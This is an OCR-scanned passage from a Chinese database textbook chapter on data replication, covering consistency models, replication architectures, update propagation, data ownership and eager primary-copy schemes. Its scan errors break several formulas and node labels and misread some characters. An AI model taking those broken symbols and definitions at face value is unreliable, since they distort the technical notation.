据 ， 并 将 客户 均匀 地 与 这 些 数据 库 连接 ， 从 而 分 散 负载 ， 如 图 26-1 所 示 。 


源 DBMS 缓存 应 用 Web 服 务 器 Web 用 户 





图 26-1 在 线 环境 下 通过 平衡 负载 改善 性 能 
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@ 支持 非 连 通 计 算 模型 。 非 连通 计算 是 指 当 用 户 不 能 与 公共 数据 库 连 通 时 仍 能 继续 操 
作 (虽然 有 可 能 损失 部 分 功能 )， 直 至 公共 数据 库 恢 复 为 可 访问 。 这 是 移动 环境 下 常 
见 的 情形 ， 在 26.4 节 讨 论 。 
然而 ,要 获得 上 述 好 处 ,复制 的 实现 起 着 关键 作用 ， 因 为 若 不 仔细 考虑 实现 ( 稍 后 详细 
讨论 )， 其 至 可 能 降低 系统 的 性 能 。 男 一 方面 ， 复 制 本 身 的 复杂 性 也 是 最 大 的 缺点 。 


26.1.1 复制 的 应 用 


复制 能 支持 各 种 各 样 的 应 用 需求 。 某 些 应 用 只 要 求 在 备份 数据 库 与 主 数据 库 间 进行 有 限 
的 同步 ， 另 一 些 应 用 则 要 求 所 有 数据 库 备 份 之 间 始 终 同 步 。 

例如 ， 考虑 支持 外 地 销售 团队 这 样 的 应 用 ， 这 是 一 个 典型 的 由 大 量 小 型 远程 移动 结 点 
与 公共 数据 库 做 阶段 同步 的 例子 。 这 些 结 点 经 常 是 自治 的 ， 与 公共 数据 库 相 对 长 期 处 于 未 连 
接 状态 。 然 而 销售 团队 的 每 个 成 员 无 论 是 否 与 公共 数据 库 相 连 ， 均 能 完成 销售 任务 。 换 句 话 
说 ， 远 程 结 点 必须 能 支持 与 销售 相关 的 所 有 事务 。 此 例 中 结 点 的 自治 性 要 比 是 否 保持 数据 一 
致 性 更 重要 。 

另 一 类 例子 可 考虑 股票 管理 这 类 人 金融 应 用 ， 它 要 求 多 个 服务 器 上 的 数据 以 连续 、 接 近 实 
时 的 方式 同步 ， 须 保证 系统 提供 服务 的 可 用 性 和 在 所 有 时 间 点 的 等 同性 。 例 如 ， 须 保证 顾客 
在 各 个 结 点 通过 Web 显示 股票 价格 时 ， 看 到 的 是 同一 价格 。 在 此 例 中 数据 同步 则 比 结 点 自 
治 更 重要 。 

我 们 将 在 26.2.5 节 提 供 更 多 关于 复制 应 用 的 例子 。 本 章 26.4 节 还 会 集中 讨论 一 种 特殊 
的 复制 应 用 ( 称 之 为 移动 数据 库 )， 以 及 此 技术 如 何 支 持 移动 工作 者 。 


26.1.2 ”复制 模型 


如 图 26-2 所 示 ， 一 个 复制 数据 库 系统 由 几 个 称 为 副本 或 备份 的 数据 库 构 成 。 由 于 每 个 
结 点 也 是 备用 结 点 ， 并 且 备 用 结 点 可 交替 地 使 用 ， 也 可 与 恢复 结合 起 来 使 用 。 形 式 上 ， 一 个 
复制 数据 库 为 n 个 结 点 构成 的 集合 $= ( 51, 9, …, S) ,1 二 2。 任 一 结 点 持 有 一 组 数据 项 x， 
x2, 2 … 的 副本 ， 在 本 章 剩余 部 分 假设 每 个 结 点 均 有 数据 库 的 完全 备份 。 为 了 区 分 各 物理 副 
本 与 逻辑 数据 项 本 身 ， 副 本 都 标 上 结 点 标记 ， 例 如 ， 在 结 点 $1 上 的 数据 项 x 的 副本 表示 为 
x!'。 由 于 多 个 事务 可 能 并 发 地 修改 不 同 结 点 上 的 副本 ,需要 有 一 个 准则 来 判定 访问 不 同 结 点 
上 副本 的 事务 执行 是 否 正确 。 正 如 在 第 22 章 讨 论 时 一 样 ， 可 串 行 性 即 为 这 样 一 个 准则 ,但 
由 于 存在 不 同 副本 ， 该 准则 被 称 为 单 副 本 可 串 行 性 (one-copy-serializability,1CSR ) 。 

单 副本 可 串 行 性 ( 1CSR) | 复制 数据 的 历史 如 果 等 同 于 单 副本 串 行 的 历史 ， 则 称 之 为 单 副 
本 可 串 行 的 (Bernsteint 等 人 ，1987 ) 。 


就 像 在 无 复制 的 数据 库 系统 中 可 用 隔离 级 放松 可 串 行 性 一 样 ， 也 可 在 复制 数据 库 中 提供 
类 似 的 功能 。 已 证 明快 照 隔离 (SI) 是 足够 强 的 一 级 隔离 ( 见 26.3.6 节 )， 它 不 会 产生 读 写 冲 
突 ， 这 是 本 章 后 面 将 会 强调 的 一 条 特别 有 益 的 性 质 。 


26.1.3 ”复制 协议 的 功能 模型 


本 节 给 出 一 个 复制 协议 的 功能 模型 ( Pedone 等 人 ，2000; Liu 和 Ozsu, 2009 )。 该 模型 显 
示 在 图 26-3 ， 分 为 如 下 几 个 阶段 。 


如 锚 六 部 分 分 布 式 DBMS 与 复制 






数据 库 服 务 器 数据 库 服务 器 
( 结 点 5 ) ( 结 点 5,) 


数据 库 服务 器 
( 结 点 5,) 


图 26-2 复制 数据 库 系统 


第 一 阶段 : 客户 向 复制 数据 库 的 某 个 结 点 提出 请 求 ， 即 称 该 结 点 为 本 地 结 点 。 

第 二 阶段 : 根据 复制 方案 ， 把 请 求 传 向 其 他 结 点 ， 称 这 些 结 点 为 远程 结 点 。 

第 三 阶段 : 处 理 请 求 。 

第 四 阶段 : 当 所 有 受 影响 的 结 点 都 处 理 完 请 求 后 ， 结 点 之 间 通 过 通信 完成 诸如 检查 不 一 
致 性 、 传 播 更 新 、 汇 集结 果 、 形 成 法 定 的 输出 形式 等 工作 ， 或 者 通过 运行 像 2PC 这 样 的 并 
发 控制 协议 ， 保 证 分 布 式 事务 的 原子 性 。 

第 五 阶段 : 结果 送 给 客户 。 
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图 26-3 复制 协议 的 功能 模型 





26.1.4 一致 性 


与 无 复制 的 数据 库 一 样 ， 在 复制 数据 库 中 事务 仍 为 ACID 工作 单元 ， 只 是 一 致 性 有 不 同 
定义 。 讨 论 一 致 性 的 诱因 是 人 们 发 现 ， 最 强 形 式 的 一 致 性 ， 即 1CSR 降低 了 复制 数据 库 的 性 
能 。 建 议 复制 系统 仅 能 从 下 面 三 条 性 质 中 选择 两 条 : 一 致 性 、 可 用 性 和 分 区 容忍 性 (Brewer,， 
2000 )， 这 称 之 为 CAP 定理 。 感 兴趣 的 读者 请 参见 Gilbert 和 Lynch ( 2001 )。 考 虑 下 面 几 类 
一 致 性 : 

@ 强 一 致 性 和 弱 一 致 性 。 在 更 新 结束 时 ， 若 数据 项 的 所 有 副本 都 具有 同一 个 值 就 称 强 

一 致 性 。 与 此 相反 ， 弱 一 致 性 意味 着 某 些 情况 下 同一 数据 项 的 不 同 副本 可 能 值 不 相 
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同 ， 但 最 终 各 副本 会 趋同 。 弱 一 致 性 有 时 也 称 为 最 终 一 致 性 。 

@ 事务 一 致 性 和 共同 一 致 性 。 共 同一 致 性 意味 着 各 副本 都 会 收敛 到 同一 个 值 ; 事务 一 
致 性 意味 着 全 局 执行 的 历史 是 1CSR。 注 意 ， 一 个 系统 可 以 是 共同 一 致 但 非 事 务 一 致 
的 ， 虽然 反之 不 真 。 

@ 会 话 一 致 性 。 会 话 一 致 性 应 是 每 一 种 复制 技术 的 基本 性 质 。 它 保证 客户 看 到 自己 所 
做 的 更 新 ， 也 称 为 读 你 所 写 (read-your-own-writes)。 如 果 客 户 看 不 见 自己 的 修改 ， 
一 种 称 为 乱 象 (race condition) 的 情形 就 会 出 现 。 乱 象 情形 可 描述 为 ， 某 个 事务 在 结 
点 9 写 了 数据 项 x， 同 一 个 事务 后 续 在 结 点 8 读 x 却 没 反映 出 写 的 信息 。 这 样 的 情 
况 甚 至 会 跨 会 话 存 在 。 例 如 考虑 这 样 的 情形 ， 某 用 户 在 结 点 5 修改 了 密码 后 退出 ， 
立即 又 登录 。 新 事务 开始 验证 密码 ， 若 该 新 事务 是 在 结 点 9 上 执行 且 5, 还 不 知道 新 
密码 ， 则 会 发 生 错误 ， 用 户 也 会 以 为 密码 还 没有 改变 。 


26.2 复制 的 体系 结构 
主要 有 两 种 实现 复制 协议 的 方式 : 基于 内 核 的 复制 和 基于 中 间 件 的 复制 ， 讨 论 如 下 。 


26.2.1 基于 内 核 的 复制 


在 数据 库 内 核实 现 复制 协议 称 为 基于 内 核 (kernel-based) 或 白 盒 (white-box) 复制 。 在 
这 种 方法 中 ， 复 制 协议 与 本 地 数据 库 系统 的 并 发 控制 机 制 紧 密 联 系 在 一 起 ， 见 图 26-4a。 客 
户 直接 与 某 个 数据 库 实例 连接 ， 由 它 来 负责 与 复制 数据 库 中 其 他 结 点 的 协调 。 


26.2.2 ”基于 中 间 件 的 复制 


另 一 种 方案 是 基于 中 间 件 的 机 制 ， 如 图 26-4b 所 示 ， 它 隐藏 了 基本 数据 库 。 中 间 件 负 
责 跨 不 同 副 本 协调 用 户 请 求 ， 而 呈现 给 用 户 就 好 像 只 有 一 个 数据 库 系统 一 样 。 为 处 理 并 发 
数据 访问 ， 复 制服 务 器 实现 自己 的 并 发 控制 机 制 。 如 果 复 制服 务 器 只 用 到 基本 数据 库 系统 
的 应 用 编程 接口 (API)， 则 称 其 为 黑 盒 的 (black-box ) 。 如 果 数 据 库 系统 暴露 某 些 信息 给 
复制 服务 器 ， 比 如 缓存 最 近 用 过 的 数据 ， 则 称 其 为 灰 盒 的 (grey-box)。 复 制 中 间 件 很 快 
就 成 为 瓶颈 ， 因 此 要 么 复制 它 〈( 见 图 26-4c) 要 么 采用 分 散 方 法 ( 见 图 26-4d)， 在 分 散 方 
法 中 ,每 个 数据 库 实例 都 有 自己 专用 的 中 间 件 ， 中 间 件 与 数据 库 一 起 构成 一 个 复制 单元 
(replication unit ) 。 
基于 内 核 与 基于 中 间 件 的 复制 

在 基于 内 核 的 复制 结构 中 ， 复 制 机 制 能 访问 数据 库 内 核 中 像 并 发 控制 这 类 机 制 ， 若 复制 
机 制 需要 锁 较 小 粒度 的 数据 ， 这 将 带 来 便利 。 基 于 中 间 件 的 方法 通常 不 分 析 SQL 语句 ， 并 
且 会 把 整 张 表 锁 起 来 以 减少 通信 开销 ， 避 免 两 次 分 析 语 句 。 紧 耦合 的 缺点 是 对 系统 实现 的 修 
改 会 彼此 影响 ， 使 得 系统 维护 变 得 更 加 困难 。 

许多 数据 库 系 统 是 得 不 到 源 代 码 的 ， 访 问 它 们 的 唯一 方法 就 是 通过 API 。 这 使 得 基于 
中 间 件 的 方法 成 为 唯一 可 行 的 方案 。 即 使 对 开源 系统 也 必须 认识 到 ， 修 改 数据 库 系统 内 核 要 
比 通过 API 访问 它 复杂 得 多 。 另 一 个 考虑 是 ， 基 于 中 间 件 的 方法 能 在 异 构 联 邦 数据 库 系 统 
中 使 用 。 在 许多 单位 ， 系 统 是 从 过 去 十 来 年 陆续 演变 而 成 的 ， 因 此 异 构 和 集成 的 特性 显得 尤 
其 重要 。 
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复制 单元 
c) 基于 复制 中 间 件 的 复制 d) 基于 分 散 中 间 件 的 复制 





图 26-4 可 选 复制 体系 结构 


复制 中 间 件 的 功能 
最 起 码 期 望 分 布 式 复制 中 间 件 能 同步 或 异步 地 从 一 个 数据 库 拷贝 数据 到 男 一 个 数据 库 。 
当然 还 需要 其 他 一 些 功能 ， 比 如 (Buretta, 1997 ): 
e 可 伸缩 性 : 应 能 处 理 小 规模 和 大 规模 数据 的 复制 。 
e@ 映射 和 转换 : 应 能 跨 异 构 DBMS 和 平台 复制 。 正 如 24.1.3 节 所 述 ， 这 可 能 涉及 将 数 
据 从 一 个 数据 模型 映射 和 转换 到 另 一 个 不 同 的 数据 模型 ， 或 者 把 一 种 数据 类 型 的 数 
据 映 射 和 转换 为 另 一 DBMS 中 对 应 的 数据 类 型 。 
e@ 对 象 复制 : 应 该 除了 数据 外 还 能 复制 对 象 。 例 如 ， 某 些 系统 允许 复制 索引 和 存储 过 
程 (或 触发 器 ) 。 
声明 复制 模式 : 系统 应 该 提供 一 个 机 制 允许 授权 用 户 声明 被 复制 的 数据 和 对 象 。 
订阅 机 制 : 系统 应 该 提供 一 个 机 制 允许 授权 用 户 订阅 可 复制 的 数据 和 对 象 。 
初始 化 机 制 : 系统 应 该 提供 一 个 机 制 允 许 目标 副本 的 初始 化 。 
易于 管理 : 应 该 使 DBA 方便 管理 系统 、 检 查 系统 状态 和 监控 复制 系统 中 各 部 分 的 
性 能 。 


26.2.3 ”更 新 处 理 


在 远程 结 点 上 处 理 更 新 也 需 维持 事务 完整 性 。 问 题 如 图 26-5a 所 示 ， 由 更 新 本 地 不 同 关 
系 的 多 个 操作 构成 的 事务 在 复制 过 程 中 被 转换 为 一 系列 分 离 的 事务 ， 每 个 分 离 事 务 负责 更 新 
一 个 关系 。 如 果 目 标 结 点 上 的 事务 某 些 成 功 某 些 失败 ， 那 么 本 地 结 点 与 远程 结 点 就 失去 了 一 
致 。 对 比 图 26-5b 所 给 基于 事务 复制 的 机 制 ， 事务 在 目标 数据 库 上 的 结构 与 其 在 源 数据 库 上 
的 结构 一 致 。 备 份 数据 到 其 他 结 点 必须 保证 事务 完整 性 ， 这 称 为 事务 型 更 新 (transactional 
update)。 与 其 相反 的 方法 ， 即 图 26-5a 所 示 ， 称 为 非 事 务 型 更 新 。 事 务 型 更 新 能 保证 事务 一 
致 性 。 
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破坏 事务 完整 性 





b) 事务 型 复制 更 新 
图 26-5 事务 型 更 新 与 非 事务 型 更 新 


写 操作 产生 复制 中 的 大 部 分 开销 ， 需 要 用 原子 的 方式 来 协调 。 一 种 好 的 做 法 是 先 收集 本 
地 结 点 上 的 所 有 更 新 ， 然 后 用 一 条 消息 传播 到 各 远程 结 点 上 去 。 该 方法 要 求 抽取 写 集合 。 写 
集合 中 每 一 项 都 由 数据 项 的 前 像 、 后 像 和 主 关键 字 构 成 。 在 大 多 数 应 用 中 ， 仅 涉及 几 个 元 组 
的 更 新 要 远 多 于 涉及 一 大 堆 元 组 的 更 新 。 对 于 涉及 一 大 堆 元 组 的 更 新 〈 例 如 ， 提 高 某 类 别 所 
有 产品 的 价格 )， 则 用 SQL 更 合适 。 对 于 仅 涉 及 几 个 元 组 的 更 新 ， 传 播 写 集合 有 如 下 好 处 : 

e 因为 所 有 更 新 都 可 使 用 ， 易 于 维持 事务 一 致 性 。 

e 能 通过 主 关 键 字 直接 访问 ， 而 不 要 求 运 行 任何 SQL 语句 (注意 ，SQL 是 基于 本 地 API)。 

e 消息 开销 极 大 地 减少 。 

抽取 写 集合 有 几 种 可 选 的 实现 方案 。 例 如 ， 可 利用 触发 器 将 所 有 更 新 先 写 人 一 个 专用 
表 ， 在 开始 进行 更 新 传播 前 再 查询 该 表 ， 获 得 事务 所 做 更 新 。 另 一 种 可 能 是 直接 从 日 志文 件 抽 
取 所 要 信息 。 也 可 以 用 专门 的 写 集合 抽取 服务 ( 若 数据 库 提 供 的 话 )， 它 顺便 也 就 是 在 访问 记 
录 的 同时 取 其 前 像 和 后 像 创建 写 集 合 。 它 与 日 志 非 常 相像 ， 不 同 的 是 实现 它 完全 是 为 了 更 新 
传播 的 需要 而 不 是 恢复 的 需要 。 在 基于 中 间 件 的 结构 中 ， 这 样 的 服务 需 通 过 API 访问 。 

如 果 本 地 结 点 用 一 条 消息 传播 所 有 更 新 ， 称 为 固定 交互 ( constant interaction)。 相 反 的 
则 称 为 线性 交互 ( linear interaction)。 交 互 时 若 无 论 事务 操作 多 少 都 要 求 同 样 多 的 消息 ， 即 
为 固定 交互 。 注 意 ,在 此 不 考虑 与 终止 协议 (例如 ，2PC 或 3PC) 相关 的 消息 ， 它 们 归 终 止 
机 制 考虑 。 


26.2.4 更 新 传播 


前 一 章 讨 论 数据 更 新 时 的 前 提 是 ， 所 有 更 新 都 作为 一 个 封闭 事务 的 组 成 部 分 来 处 理 。 这 
样 做 的 必要 性 是 因为 分 布 式 事务 可 能 访问 不 同 结 点 上 的 不 同 段 ， 换 名 话说， 更 新 须 立 即 作用 
到 每 一 结 点 上 去 。 其 原子 性 由 25.4.3 节 讨 论 的 2PC (两 阶段 提交 ) 协议 保证 。 在 复制 数据 库 
中 ， 立 即 传播 更 新 称 为 积极 或 同步 更 新 传播 ( eager or synchronous update propagation ) 。 积 
极 更 新 传播 保证 在 封闭 事务 内 更 新 完 所 有 副本 ， 并 通过 投票 保证 原子 性 。 

积极 复制 的 一 种 替换 机 制 称 为 懒惰 或 异步 更 新 传播 (lazy or asynchronous update propagation ) 。 
采用 这 种 机 制 ， 目 标 数 据 库 的 更 新 滞后 于 源 数据 库 更 新 。 重 新 获得 一 致 性 的 时 间 可 能 要 延 
迟 数 秒 到 数 小 时 ， 其 至 数 天 。 不 过 所 有 结 点 的 数据 最 终 会 同步 到 相同 的 值 上 (最终 一 致 性 )。 
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虽然 并 非 所 有 的 应 用 都 能 容忍 这 样 的 延迟 ， 这 是 不 得 已 而 对 数据 完整 性 和 可 用 性 的 折 中 ， 它 
适用 于 那些 允许 用 副本 工作 ， 并 不 要 求 数据 时 刻 同步 且 为 最 新 的 组 织 机 构 。 


26.2.5 ”更 新 场所 (数据 所 有 权 ) 


更 新 场所 (update location) 或 称 数据 所 有 权 (data ownership) 关系 到 有 权 更 新 数据 的 结 
点 ， 即 拥有 数据 的 结 点 。 所 有 权 分 主 辅 (也 称 主 从 ) 备份 、 工 作 流 和 随处 更 新 (有 时 也 称 为 
每 处 更 新 或 点 对 点 复制 、 对 称 复制 ) 几 种 类 型 。 
主 备份 所 有 权 
与 2PL 协议 组 合 的 主 备份 已 在 25.2.3 节 讨 论 过 。 主 备份 所 有 权 ( primary copy ownership) 
的 中 心思 想 是 ， 复 制 的 数据 归 某 个 结 点 ， 即 主 备份 所 有 ， 只 有 在 该 结 点 上 能 更 新 数据 。 若 用 
出 版 - 订阅 机 制 类 比 ， 主 备份 (出 版 者 ) 使 得 数据 在 辅 备份 处 (订阅 者 ) 可 用 。 辅 备份 订阅 
主 备份 拥有 的 数据 ， 意 味 着 在 本 地 接收 到 一 个 只 读 副本 。 当 然 ， 每 个 结 点 都 可 能 成 为 不 重 笃 
数据 集 的 主 备份 。 但 对 于 一 个 具体 的 数据 集 ， 总 是 只 有 一 个 结 点 能 更 新 主 备 份 ， 所 以 不 会 出 
现 副 本 之 间 更 新 的 冲突 。 下 面 这 些 例子 说 明了 这 一 类 复制 可 能 的 用 途 : 
@ 决策 支持 系统 (DSS) 分 析 。 可 把 一 个 或 多 个 分 布 式 数据 库 中 的 数据 印 载 到 本 地 
DSS， 进 行 只 读 的 分 析 。 例 如 ， 对 于 DreamHome， 可 以 收集 所 有 房产 出 租 、 销 售 以 
及 客户 的 详细 资料 信息 ， 并 且 通 过 分 析 找 出 规律 ， 比 如 哪些 人 更 希望 购买 或 租赁 在 
特定 价格 和 区 域 范围 内 的 房产 。 我 们 将 在 第 33、34 章 讨论 那些 为 数据 分 析 服 务 的 复 
制 技术 ， 包 括 联 机 分 析 处 理 (OLAP) 和 数据 挖掘 。 
@ 集中 式 信息 的 分 布 和 分 发 。 数 据 分 发 描述 了 这 样 的 环境 ， 数 据 在 中 心 结 点 进行 更 新 ， 
然后 复制 到 只 读 结 点 。 例 如 ， 价 目 表 等 一 类 产品 消息 可 以 在 总 部 公共 结 点 维护 ， 而 
在 远程 分 公司 中 复制 只 读 副 本 。 这 种 类 型 的 复制 如 图 26-6a 所 示 。 
@ 远程 信息 的 合并 。 数 据 合并 描述 了 这 样 的 一 种 环境 : 数据 在 各 个 本 地 结 点 进行 更 新 ， 
而 后 将 数据 收集 到 某 个 结 点 ， 形 成 只 读 的 储存 库 。 这 种 方法 向 每 个 结 点 赋予 了 数据 
的 所 有 权 和 自治 权 。 例 如 ， 在 每 个 分 公司 中 维护 的 房产 详细 信息 可 以 复制 到 总 部 公 
共 结 点 ， 形 成 固化 的 只 读数 据 副本 。 这 种 类 型 的 复制 如 图 26-6b 所 示 。 





(只 读 ) (只 读 ) ( 读 / 写 ) ( 读 / 写 ) 
主 结 点 从 结 点 
( 读 写 ) (只 读 ) 
a ) 数据 分 发 b ) 数据 合并 


图 26-6 主 从 所 有 权 
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e 移动 计算 : 移动 计算 在 最 近 几 年 变 得 广 为 接 受 ， 因 为 在 大 部 分 公司 中 ， 总 有 一 些 人 
不 在 办 公 室 里 工作 。 现 在 有 许多 方法 为 移动 工作 者 提供 数据 ， 复 制 是 其 中 之 一 。 这 
种 情况 下 ， 数 据 根 据 需 要 从 本 地 工作 组 服务 器 下 载 。 利 用 移动 客户 端 对 工作 组 或 中 
央 的 数据 进行 更 新 ， 如 插入 新 客户 或 订单 信息 等 ， 都 是 使 用 类 似 方法 处 理 的 。 

以 DreamHome 为 例 ， 可 这 样 实现 分 布 式 DBMS : 允许 每 个 分 公司 各 自 拥有 关系 
PropertyForRent、Client 和 Lease 的 水 平分 段 。 而 总 部 中 心 结 点 通过 订阅 这 些 属于 各 分 公司 
的 数据 ， 来 维持 整个 公司 所 有 房产 、 客 户 和 租约 信息 的 一 个 固化 的 只 读 副本 。 

主 结 点 可 以 拥有 整个 关系 中 的 数据 ， 此 时 ， 其 他 结 点 订阅 该 关系 的 只 读 副 本 。 另 一 种 
选择 是 ， 由 多 个 结 点 拥有 关系 的 不 同 分 段 ， 而 其 他 结 点 订阅 这 些 关系 分 段 的 只 读 副 本 。 这 
类 复制 称 为 不 对 称 复制 。 注 意 更 新 传播 与 此 是 正 交 关 系 ， 即 它 可 能 是 积极 的 ， 也 可 能 是 懒 
惰 的 。 

在 主 备份 这 种 方法 中 ， 只 读 事 务 须 明确 标识 出 来 。 因 为 系统 必须 能 识别 出 更 新 是 否 来 自 
只 读 事务 。 在 辅 备份 上 只 允许 运行 只 读 事务 。 未 显示 标记 为 只 读 的 事务 不 可 以 在 辅 备份 上 执 
行 ， 系 统 将 假设 它 含 更 新 操作 ， 只 得 在 主 备份 上 运行 。 若 设想 辅 备份 可 将 更 新 操作 传送 给 能 
找到 的 主 备 份 ， 在 那儿 完成 更 新 ， 但 这 并 不 是 一 种 好 办 法 。 考 虑 事务 Ti 在 结 点 S1 上 执行 操 
作 read(x)、write(y) 和 read(y)。 当 执行 完 read(x) 后 ， 它 只 能 立即 把 write(y) 传 给 主 备份 S;。 
此 时 ，S; 在 本 地 执行 写 操作 并 触发 把 该 写 操作 传递 给 包括 1 在 内 的 所 有 结 点 。 为 保证 读 自 
己 所 写 ( read-your-own-write)，Ti 将 不 得 不 等 待 所 有 结 点 都 提交 完 这 个 写 操作 。 而 且 在 各 
远程 结 点 上 ， 这 个 写 操作 是 被 封 在 一 个 新 事务 中 的 。 特 别 关 键 的 一 点 是 , 若 Ti 在 结 点 Si 的 
后 续 操 作 失 败 ， 则 将 要 求 回 滚 一 个 已 经 提交 的 状态 ， 这 显然 是 被 禁止 的 。 
随处 更 新 (对 称 复制 ) 所 有 权 

在 任何 给 定时 刻 ， 只 有 一 个 结 点 可 以 更 新 数据 ， 而 其 他 所 有 结 点 只 能 对 副本 进行 只 读 访 
问 这 个 要 求 ， 对 于 某 些 场 合 来 说 过 于 苛刻 ， 使 得 当 更 新 事务 数目 增多 时 ， 主 备份 很 快 成 为 瓶 
颈 。 随 处 更 新 方案 创建 对 等 环境 ， 其 中 多 个 结 点 都 拥有 相同 的 更 新 复制 数据 的 权力 。 随 处 更 
新 技术 基于 ROWA (Read-One-Write-All) 方法 。ROWA 有 一 个 缺点 ， 一旦 有 结 点 不 可 用 ， 
事务 就 不 得 不 撤销 ， 这 个 问题 可 通过 ROWAA ( Read-One-Write-All-Available) 机 制 解决 。 
实际 上 ， 基 于 多 数 方法 ( 读 写 至 少 多 数 个 结 点 ) 常用 于 增强 容错 能 力 。 

以 DreamHome 为 例 ， 可 以 决策 设置 一 部 热线 ， 人 允许 潜在 的 客户 拨打 免费 电话 来 登记 对 
某 个 地 段 和 房产 的 兴趣 ， 或 是 预约 现场 看 房 ， 或 者 任何 其 他 只 有 通过 访问 分 公司 才能 够 完 
的 工作 。 每 个 分 公司 都 建立 呼叫 中 心 。 电 话 呼叫 总 被 转 到 最 近 的 分 公司 。 例 如 ， 某 人 在 格拉 
斯 哥 打 电话 咨询 伦敦 的 房子 ， 那 么 电话 首先 转 到 格拉 斯 哥 的 分 公司 。 远 程 通 信 系 统 负责 平衡 
负载 ， 如 果 格 拉 斯 哥 非 常 繁忙 ， 呼 叫 可 能 会 转 到 爱丁堡 。 每 个 呼叫 中 心 需 要 能 够 访问 和 更 新 
在 任何 其 他 分 公司 的 数据 ， 并 且 能 够 将 更 新 的 结果 复制 给 其 他 结 点 ， 如 图 26-7 所 示 。 
工作 流 所 有 权 

像 主 备份 所 有 权 一 样 ， 工 作 流 所 有 权 模型 也 避免 更 新 冲突 ， 同 时 提供 更 加 动态 的 所 有 权 
模型 。 工 作 流 所 有 权 人 允许 更 新 复制 数据 的 权力 在 结 点 之 间 流 动 。 但 是 ,在 任何 时 刻 ， 只 存在 
一 个 结 点 能 够 更 新 特定 的 数据 集 。 工 作 流 所 有 权 的 典型 例子 是 有 序 处 理 系统 ， 其 中 处 理 的 顺 
序 按照 一 定 的 步骤 进行 ， 比 如 说 订货 人 库 、 贷 款 审批 、 货 品 计价 、 托 运 等 。 

在 集中 式 DBMS 中 ， 这 类 应 用 在 集成 的 数据 库 中 访问 和 更 新 数据 。 仅 当 有 序 状态 的 上 
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一 步 操作 被 说 明 已 经 完成 时 ， 应 用 才 按 顺序 更 新 有 序数 据 。 在 工作 流 所 有 权 模 型 中 ， 应 用 分 
布 在 不 同 的 结 点 中 ， 当 数据 向 顺序 链 中 下 一 个 结 点 复制 和 传送 时 ， 更 新 数据 的 权力 也 随 之 移 
动 ， 如 图 26-8 所 示 。 








图 26-8 工作 流 所 有 权 
26.2.6 ”终止 协议 


投票 终止 (voting termination ) 


正 像 在 分 布 式 DBMS 中 一 样 ， 投 票 协议 〈 例 如 2PC) 能 保证 跨 结 点 执行 事务 的 原子 性 。 
投票 对 系统 容错 能 力也 会 有 影响 。 例如 ， 如 果 事 务 Ti 在 结 点 Si 修改 了 数据 项 x， 而 投票 协 
议 未 能 确认 此 更 新 在 结 点 $: 安装 好 ， 那 就 不 能 保证 作为 事务 组 成 部 分 的 其 他 结 点 已 更 新 好 
了 ， 此 时 若 $1 故障 ，Ti 所 做 的 修改 丢失 。 远 程 事务 执行 不 包含 在 本 地 事务 范围 内 的 称 为 1- 
安全 (Gray 和 Reuter, 1993 ) ; 此 时 若 本 地 结 点 发 生 故障 ， 更 新 将 丢失 。 对 应 地 ， 一 个 呈 安 
全 设计 为 多 至 n-1 个 结 点 故障 时 所 做 更 新 仍 不 会 丢失 ， 此 处 n 为 其 上 的 更 新 均 作为 本 地 事务 
的 一 部 分 的 结 点 的 数目 。 系 统 通常 至 少 应 为 2- 安全 的 。 
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不 投票 终止 (nonvoting termination ) 

有 些 复 制 技术 试图 免 去 投票 ， 以 减少 发 送 消 息 的 开销 ， 提 高 性 能 和 可 伸缩 性 。 然 而 ， 没 
有 投票 阶段 则 意味 着 事务 的 原子 性 要 靠 某 种 其 他 方式 来 保证 (没有 原子 性 可 不 行 ， 因 为 那 将 
破坏 一 致 性 )。 在 随处 更 新 结构 中 ， 一 种 解决 办 法 是 如 下 节 将 讨论 的 组 通信 协议 。 


26.3 ”复制 模式 


本 节 考 虑 前 面 讨 论 的 两 种 性 质 ( 即 更 新 传播 和 更 新 场所 ) 的 组 合 情 况 ， 在 此 不 考虑 工作 
流 所 有 权 。 将 更 新 传播 与 更 新 场所 的 一 种 组 合 称 为 一 种 模式 。 共 有 下 面 四 种 模式 : 

(1 ) 积极 与 主 备份 组 合 ， 称 为 积极 主 备份 (eager primary copy)。 

(2 ) 积极 与 随处 更 新 组 合 ， 称 为 积极 随处 更 新 (eager update anywhere)。 

(3 ) 懒惰 与 主 备份 组 合 ， 称 为 懒惰 主 备份 。 

(4 ) 懒惰 与 随处 更 新 组 合 ， 称 为 懒惰 随处 更 新 。 

再 考虑 交互 和 投票 后 的 扩展 分 类 见 Wiesmann 等 人 (2000)。 除 这 些 模 式 外 ,我们 还 将 
讨论 快照 集成 和 如 何 通 过 组 通信 在 复制 数据 库 中 使 用 完全 统一 序 广播 ， 以 及 基于 中 间 件 实现 
这 样 一 种 技术 。 


26.3.1 积极 主 备 份 


在 这 种 模式 中 ， 更 新 只 发 生 在 主 备份 处 ， 主 备份 积极 地 把 更 新 传播 到 各 个 辅 备份 。 辅 备 
份 上 只 人 允许 处 理 只 读 事务 ， 为 保证 修改 事务 的 原子 性 ， 所 有 结 点 上 经 历 一 个 投票 阶段 (功能 
模型 中 的 第 四 阶段 )。 主 结 点 能 如 图 26-9 说 明 的 那样 一 个 个 更 新 地 传播 ， 也 可 以 如 图 26-10 
所 示 ， 直 到 事务 做 完 所 有 操作 ， 抽 取出 写 集合 ， 用 一 条 消息 把 所 有 修改 一 次 性 传 给 每 一 个 辅 
备份 。 下 面 集中 讨论 主 、 辅 备份 的 恢复 。 马 上 看 到 ， 主 备份 的 恢复 是 一 项 挑战 性 任务 (这 里 
的 讨论 对 所 有 主 备份 模式 均 有 效 )。 


主 备份 
处 理 | 
er re 
ed sp 
F 播 
(开始 和 操作 1 ) 


辅 备份 


浊 处 理 “| 
af | nan | 


时 间 一 上 





图 26-9 采用 线性 交互 和 投票 的 积极 主 备 份 


恢复 

复制 数据 库 中 的 恢复 机 制 必须 能 在 运行 时 合适 地 恢复 出 完整 的 结 点 。 在 主 备份 模 式 中 ， 
主 结 点 为 单 点 失效 ， 因 此 在 主 结 点 出 故障 时 ， 恢 复 机 制 需 推 举 出 一 个 辅 结 点 。 辅 结 点 出 错 的 
情况 也 不 得 不 考虑 ， 但 因为 存在 主 结 点 会 相对 好 办 一 些 。 在 启动 恢复 机 制 之 前 ， 重 要 的 是 诊 


80 六 部 分 分 布 式 DBMS 与 复 齐 


断 哪个 结 点 出 问题 了 ， 是 主 结 点 还 是 辅 结 点 ， 还 是 都 坏 了 。 此 外 ， 还 需 检查 两 个 结 点 之 间 的 
